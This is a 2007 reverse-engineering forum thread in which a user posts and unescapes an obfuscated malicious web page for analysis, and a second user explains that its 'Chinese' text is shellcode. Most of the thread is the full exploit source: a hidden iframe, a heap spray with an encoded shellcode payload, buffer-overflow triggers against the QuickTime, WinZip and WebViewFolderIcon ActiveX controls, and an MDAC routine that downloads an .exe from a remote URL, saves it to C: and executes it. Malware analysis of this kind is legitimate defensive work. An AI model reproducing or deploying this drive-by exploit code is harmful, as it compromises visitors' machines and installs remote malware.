9%20%7b%0a%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%7b%0a%09%09%09%09%76%5b%30%5d%20%3d%20%43%72 %65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%6d%73%78%6d%6c%32%2e%58%4d%4c%48%54%54%50%22%29%3b%0a% 09%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%6 3%74%28%61%2c%20%22%4d%69%63%72%6f%73%6f%66%74%2e%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%09%69%66 %20%28%21%20%76%5b%30%5d%29%20%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20% 22%4d%53%58%4d%4c%32%2e%53%65%72%76%65%72%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%7d%0a%0a%09%09%0 9%69%66%20%28%21%20%76%5b%31%5d%29%20%7b%0a%09%09%09%09%76%5b%31%5d%20%3d%20%43%72%65%61%74%65%4f%62 %6a%65%63%74%28%61%2c%20%22%41%44%4f%44%42%2e%53%74%72%65%61%6d%22%29%3b%0a%09%09%09%7d%0a%0a%09%09% 09%69%66%20%28%21%20%76%5b%32%5d%29%20%7b%0a%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f%6 2%6a%65%63%74%28%61%2c%20%22%57%53%63%72%69%70%74%2e%53%68%65%6c%6c%22%29%3b%0a%09%09%09%09%69%66%20 %28%21%20%76%5b%32%5d%29%20%7b%0a%09%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65% 63%74%28%61%2c%20%22%53%68%65%6c%6c%2e%41%70%70%6c%69%63%61%74%69%6f%6e%22%29%3b%0a%09%09%09%09%09%6 9%66%20%28%76%5b%32%5d%29%20%6e%3d%31%3b%0a%09%09%09%09%7d%0a%09%09%09%7d%0a%09%09%7d%0a%0a%09%09%69 %2b%2b%3b%0a%09%7d%0a%0a%09%69%66%20%28%76%5b%30%5d%20%26%26%20%76%5b%31%5d%20%26%26%20%76%5b%32%5d% 29%20%7b%0a%09%09%76%61%72%20%64%61%74%61%20%3d%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c%6f%61%64%28%7 6%5b%30%5d%2c%20%75%72%6c%52%65%61%6c%45%78%65%29%3b%0a%09%09%69%66%20%28%64%61%74%61%20%21%3d%20%30 %29%20%7b%0a%09%09%09%76%61%72%20%6e%61%6d%65%20%3d%20%22%63%3a%5c%5c%73%79%73%22%2b%47%65%74%52%61% 6e%64%53%74%72%69%6e%67%28%34%29%2b%22%2e%65%78%65%22%3b%0a%09%09%09%69%66%20%28%41%44%4f%42%44%53%7 4%72%65%61%6d%53%61%76%65%28%76%5b%31%5d%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29%20%3d%3d%20%31%29%20 %7b%0a%09%09%09%09%69%66%20%28%53%68%65%6c%6c%45%78%65%63%75%74%65%28%76%5b%32%5d%2c%20%6e%61%6d%65% 2c%20%6e%29%20%3d%3d%20%31%29%20%7b%0a%09%09%09%09%09%72%65%74%3d%31%3b%0a%09%09%09%09%7d%0a%09%09%0 9%7d%0a%09%09%7d%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%65%74%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f %6e%20%73%74%61%72%74%28%29%20%7b%0a%0a%09%69%66%20%28%21%20%4d%44%41%43%28%29%20%29%20%7b%20%73%74% 61%72%74%4f%76%65%72%66%6c%6f%77%28%30%29%3b%20%7d%0a%0a%7d%0a%0a%73%74%61%72%74%20%28%29%3b%0a%0a%3 c%2f%73%63%72%69%70%74%3e%0a%3c%2f%62%6f%64%79%3e%0a%3c%2f%68%74%6d%6c%3e%0a%0a%0a');

 



document.write (SB);



The 'obfuscation' is a simple escape manipulation

The first unescaped code
Code:
<html> 

<body> 

<div id="mydiv"></div> 

<iframe style='display:none' width=1 height=1 src='http://foo.address1.com/bar/'></iframe> 



<script language="JavaScript"> 



var memory = new Array(); 

var mem_flag = 0; 



function having() { memory=memory; setTimeout("having()", 2000); } 



function getSpraySlide(spraySlide, spraySlideSize) 

{ 

   while (spraySlide.length*2<spraySlideSize) 

   {spraySlide += spraySlide;} 



   spraySlide = spraySlide.substring(0,spraySlideSize/2); 

   return spraySlide; 

} 



function makeSlide() 

{ 

   var heapSprayToAddress = 0x0c0c0c0c; 

   var payLoadCode = unescape("䍃䍃࿫㍛曉肹老" + 

"↓￿譿�擯齤䋳齤滧" + 

"擯뤃憇܃ꩦ맫瞇攑ߡꩦ맧" + 

"쪇ၟܭꩦ맣‡༡ޏꩦ맿⺇ખ" + 

"ݗꩦ꿻흯騬昕뇯驦擋" + 

"撶޹螿鿀砇曯⩤⽬暿쾪" + 

"ႇ뿯ꩤ藻뛭멤߷ꫬ⣏돯솑⢊" + 

"誗騐擏撶꼇藯럨ꫬ�밴Ⴜ" + 

"쾚벿ꩤ藳뛪멤߷騐擏撶" + 

"'藯搐ᆰ撶껯붴໬໬໬໬" + 

"ͬ뗫撼വ봘༐撺搃뉤맣鱤擓뤜" + 

"饤�꘦䊮ⳬ�qᷕ℮꼝Ḅᇔ" + 

"骱딊Ѥ땤褲撤㋬넪ⶲᬇ" + 

"ထ먐ꎽꂢ" +





Here is the unescaped version of PayLoadCode
Quote:
䍃䍃࿫㍛曉肹老
↓￿譿?擯齤䋳齤滧擯뤃憇܃ꩦ맫瞇攑ߡꩦ맧쪇ၟܭꩦ맣‡༡ޏꩦ맿⺇ખݗꩦ꿻흯騬昕뇯驦擋撶޹螿鿀砇曯⩤⽬暿쾪ႇ뿯ꩤ藻뛭멤߷ꫬ⣏돯솑⢊誗騐擏 撶꼇藯럨ꫬ?밴Ⴜ쾚벿ꩤ藳뛪멤߷騐擏撶
'藯搐ᆰ撶껯붴໬໬໬໬ͬ뗫撼വ봘༐撺搃뉤맣鱤擓뤜饤?꘦䊮ⳬ?qᷕ℮꼝Ḅᇔ骱딊Ѥ땤褲撤㋬넪ⶲᬇထ먐ꎽꂢ


With some research I determined it to be some chinese stuff, here is the translation that Google gave me, maybe someone could explain it, please ?

Code:
䍃䍃࿫ ㍛ Xiao Xi old  

   ↓ Hui  exclude  Quan䋳Quanxiao   exclude 뤃憇 ܃   ꩦ 맫 H攑ߡ   ꩦ 맧쪇 ၟ ܭ   ꩦ 맣 ‡ ༡ ޏ   ꩦ 맿 ⺇ ખ ݗ   ꩦ 꿻흯 Cheng Xin    뇯骦block   Hua Jiang  ޹    鿀 Min Zhu  ⩤ ⽬ Xi 쾪 ႇ  뿯 ꩤ algae 뛭멤 ߷   ꫬ ⣏ 돯솑 ⢊ 誗   inspection Qing Hua  꼇  Wei 럨 ꫬ 밴 Ⴜ 쾚벿 ꩤ藳뛪멤 ߷    mortem Qing Hua    

' Hua Wei搐ᆰ    껯붴 ໬ ໬ ໬ ໬ ͬ 뗫 shake വ 봘 ༐撺Zong  뉤맣鱤Kuai   뤜饤 ꘦䊮ⳬ  q ᷕ  ℮  꼝 Ḅ ᇔ probes 딊 Ѥ 땤  pants  dismantling  ㋬   넪 ⶲ  ᬇ ထ 먐 ꎽ ꂢ 



Here is the unescaped version of MR2
Code:
); 

   var heapBlockSize = 0x400000; 

   var payLoadSize = payLoadCode.length * 2; 

   var spraySlideSize = heapBlockSize - (payLoadSize+0x38); 

   var spraySlide = unescape("ఌఌ"; 



   spraySlide = getSpraySlide(spraySlide,spraySlideSize); 

   heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; 

    

   for (i=0;i<heapBlocks;i++) 

   { 

      memory[I] = spraySlide + payLoadCode; 

   } 



   mem_flag = 1; 

   having(); 

   return memory; 

} 



function startWVF() 

{ 

   for (i=0;i<128;i++) 

   { 

      try{ 

         var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1'); 

         tar.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c,0x0c0c0c0c ); 

      }catch(e){} 

   } 

} 



function startWinZip(object) 

{ 

   var xh = 'A'; 

   while (xh.length < 231) xh+='A'; 

   xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c"; 

   object.CreateNewFolderFromName(xh); 

} 



function startOverflow(num) 

{ 

   if (num == 0) { 

      try { 

         var qt = new ActiveXObject('QuickTime.QuickTime');       

         if (qt) { 

            var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+ 

            '<param name="src" value="http://address2.com/tXlwpKDL/uCfIXrUcVpycMkVj.qtl">'+ 

            '<param name="autoplay" value="true">'+ 

            '<param name="loop" value="false">'+ 

            '<param name="controller" value="true">'+ 

            '</object>'; 

            if (! mem_flag) makeSlide(); 

            document.getElementById('mydiv').innerHTML = qthtml; 

            num = 255; 

         } 

      } catch(e) { } 



      if (num = 255) setTimeout("startOverflow(1)", 2000); 

      else startOverflow(1); 



   } else if (num == 1) { 

      try { 

         var winzip = document.createElement("object"; 

         winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904"; 



         var ret=winzip.CreateNewFolderFromName(unescape("%00"); 

         if (ret == false) { 

            if (! mem_flag) makeSlide(); 

            startWinZip(winzip); 

            num = 255; 

         } 



      } catch(e) { } 



      if (num = 255) setTimeout("startOverflow(2)", 2000); 

      else startOverflow(2); 



   } else if (num == 2) { 



      try { 

         var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1'); 

         if (tar) { 

            if (! mem_flag) makeSlide(); 

            startWVF(); 

         } 

      } catch(e) { } 

   } 

} 





function GetRandString(len) 

{ 

   var chars = "abcdefghiklmnopqrstuvwxyz"; 

   var string_length = len; 

   var randomstring = ''; 

   for (var i=0; i<string_length; i++) { 

      var rnum = Math.floor(Math.random() * chars.length); 

      randomstring += chars.substring(rnum,rnum+1); 

   } 



   return randomstring; 

} 



function CreateObject(CLSID, name) { 

   var r = null; 

   try { eval('r = CLSID.CreateObject(name)') }catch(e){}    

   if (! r) { try { eval('r = CLSID.CreateObject(name, ""') }catch(e){} } 

   if (! r) { try { eval('r = CLSID.CreateObject(name, "", ""') }catch(e){} } 

   if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} } 

   if (! r) { try { eval('r = CLSID.GetObject(name, ""') }catch(e){} } 

   if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} } 

   return(r); 

} 



function XMLHttpDownload(xml, url) { 



   try { 

      xml.open("GET", url, false); 

      xml.send(null); 



   } catch(e) { return 0; } 



   return xml.responseBody; 

} 



function ADOBDStreamSave(o, name, data) { 



   try { 

      o.Type = 1; 

      o.Mode = 3; 

      o.Open(); 

      o.Write(data); 

      o.SaveToFile(name, 2); 

      o.Close(); 

   } catch(e) { return 0; } 



   return 1; 

} 



function ShellExecute(exec, name, type) { 



   if (type == 0) { 

      try { exec.Run(name, 0); return 1; } catch(e) { } 

   } else { 

      try { exe.ShellExecute(name); return 1; } catch(e) { } 

   } 



   return(0); 



} 



function MDAC() { 

   var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null); 

   var v = new Array(null, null, null); 

   var i = 0; 

   var n = 0; 

   var ret = 0; 

   var urlRealExe =



Here is the unescaped version of MU2
Code:
; 



   while (t[I] && (! v[0] || ! v[1] || ! v[2]) ) { 

      var a = null; 



      try { 

         a = document.createElement("object"; 

         a.setAttribute("classid", "clsid:" + t[I].substring(1, t[I].length - 1)); 

      } catch(e) { a = null; } 

       

      if (a) { 

         if (! v[0]) { 

            v[0] = CreateObject(a, "msxml2.XMLHTTP"; 

            if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP"; 

            if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP"; 

         } 



         if (! v[1]) { 

            v[1] = CreateObject(a, "ADODB.Stream"; 

         } 



         if (! v[2]) { 

            v[2] = CreateObject(a, "WScript.Shell"; 

            if (! v[2]) { 

               v[2] = CreateObject(a, "Shell.Application"; 

               if (v[2]) n=1; 

            } 

         } 

      } 



      i++; 

   } 



   if (v[0] && v[1] && v[2]) { 

      var data = XMLHttpDownload(v[0], urlRealExe); 

      if (data != 0) { 

         var name = "c:\\sys"+GetRandString(4)+".exe"; 

         if (ADOBDStreamSave(v[1], name, data) == 1) { 

            if (ShellExecute(v[2], name, n) == 1) { 

               ret=1; 

            } 

         } 

      } 

   } 



   return ret; 

} 



function start() { 



   if (! MDAC() ) { startOverflow(0); } 



} 



start (); 



</script> 

</body> 

</html>





Some investigation about the links used into the script:
http://foo.address1.com/bar/ gives a 404 error code (Apache 1.3)
http://foo.address1.com gives a 502 error code (nginx)
http://address1.com gives a hello world
Whois query returns that this server is from the hosting company.

Let's continue with the one hosting the .qtl file
http://address2.com/tXlwpKDL/uCfIXrUcVpycMkVj.qtl

The qtl file format is a QuickTime Media File, here is his MIME type
application/x-quicktimeplayer
video/x-quicktimeplayer

Let's google it,
http://projects.info-pull.com/moab/MOAB-01-01-2007.html
Quote:
an attacker could overflow a stack-based buffer [...] leading to an exploitable remote arbitrary code execution condition.



I made a little archive.
The code is not dangerous as is but still I respect the rules.
Me code write good..

MALWARE/BIOHAZARD
pass: malware
LLXX
November 10th, 2007, 03:23
Nothing easier than having the source code to analyze

Quote:
With some research I determined it to be some chinese stuff, here is the translation that Google gave me, maybe someone could explain it, please ?
Read the code, notice the following:

- payLoadCode
- heapBlockSize
- payLoadSize = payLoadCode.length * 2
- 0x400000

NOW ask yourself why you would ever think it's "some chinese stuff"
Silkut
November 10th, 2007, 03:48
Hi and thanks for your answer LLXX,
It is maybe idiot but I thought it was chinese while I unescaped the value of payLoadCode.

Maybe there is a problem with this forum, as I put the escaped version of payLoadCode it was automatically translated to some char I can't read (probably because I don't have the font char), Same thing with the google translated part I have little upside down vertices, here is what I see:
LLXX
November 10th, 2007, 04:19
Yes, because they're not valid characters in any Chinese encoding either

Hexdump? I'm quite sure this forum handles 0123456789abcdef just fine.
Silkut
November 10th, 2007, 05:47
No look,
The payLoadCode value is a concatenation of escaped strings. I unescaped them and it gave me pipe char strings showing me I did not had the correct font char, I went on google and translated those things, it apparead to show some chinese name, now I don't know if it means it's from chinese or if it's only code.
What I meant with the image is that I copy/pasted the escaped version originally found in the code, and the forum transformed them into those upside down vertices.
Anyway thanks for your answer, there is no misteries about that code anymore.